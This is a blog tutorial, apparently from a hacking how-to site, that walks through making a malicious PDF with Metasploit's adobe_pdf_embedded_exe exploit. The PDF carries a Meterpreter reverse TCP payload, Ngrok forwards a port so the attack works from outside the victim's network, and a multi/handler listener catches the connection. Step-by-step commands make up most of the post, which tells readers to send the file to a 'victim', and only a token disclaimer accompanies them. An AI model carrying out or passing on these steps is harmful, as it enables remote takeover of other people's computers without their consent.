The Portable Document Format (PDF) is a file format developed by Adobe in the 1990s to present documents, including text formatting and images.

In this post, we will learn, how to hack windows using a malicious pdf file. We will use the Ngrok tool for the Port Forwarding so that we can perform this attack outside the network. If You want to Launch this attack on the same network, You can replace the LHOST and LPORT (Step 7) with Your own Local IP Address.

Disclaimer: This post is only for educational purpous and we are not responsible for any illegal work done by you

What Are We Covering Today?

1.Create a Malicious PDF file using Metasploit

2. Port Forwarding using Ngrok

3. Create a Listener for our Malicious Payload using Metasploit

4. Read this post on Android Hacking (Recommended)

1. Steps to create a Malicious Payload using Metasploit Framework 

Step 1: Open terminal and type this command to start Metasploit Framework

msfconsole

Step 2: Now enter the following command to find the exploit

search type:exploit platform:windows adobe pdf

Step 3: There are lots of exploits available which you can try, but we will use the following one. Type the following command to use the exploit

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Step 4: Now we need to specify the Payload to be Injected into PDF, for that type the following command

set payload windows/meterpreter/reverse_tcp

This will create a Reverse TCP connection to the attacker Machine

Step 5: Now start the Ngrok so that we can use the port forwarding. to launch the ngrok, type the following command

./ngrok tcp 1234

If you don’t Know about Ngrok, you can read this post. I have already explained the installation guide of Ngrok

Step 6: Once, You have started the Ngrok, the address before the colon(:) is Your LHOST and after the colon is LPORT as

Hack Windows using a malicious pdf file

In Your case, the LHOST and LPORT will be changed. Replace these in the following command with your own

Step 7: Now to set the LHOST, type the following command

set LHOST 0.tcp.ngrok.io

Step 8: type the following command to set the LPORT

set LPORT 13288

Step 9: Now set the name of the file by this command

set FileNAME test.pdf

Step 10: Now to check our options again so that whether everything is ready to go or not. for that enter the command

show options

Step 11: Now type exploit

exploit
Hack Windows using a malicious pdf file

Metasploit has created a PDF named test.pdf that contains the Meterpeter listener. Metasploit has placed this file at /root/.msf4/local/test.pdf. Send this pdf by any method to the Victim

3. Create a Listener for our Malicious Payload using Metasploit

To create a listener for our Backdoor Connection, we need to type a bunch of commands

Step 1: Open Metasploit in a new terminal by the following command

msfconsole

Step 2: Now execute the following commands one by one

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 1234
exploit

So as the victim opens the PDF file, a meterpreter connection will be eatablished. You can perform lots of operation after that. Just type help and there will be list of commands which you can execute

–>> You may encounter certain errors or running issues. So do not panic! Just comment your queries below or you can send your query here. We will get back to you soon!


Rajesh Ranjan

I'm a tech enthusiast currently pursuing B.Tech in Computer Science & Engineering. trying to make things as simple as possible

Leave a Reply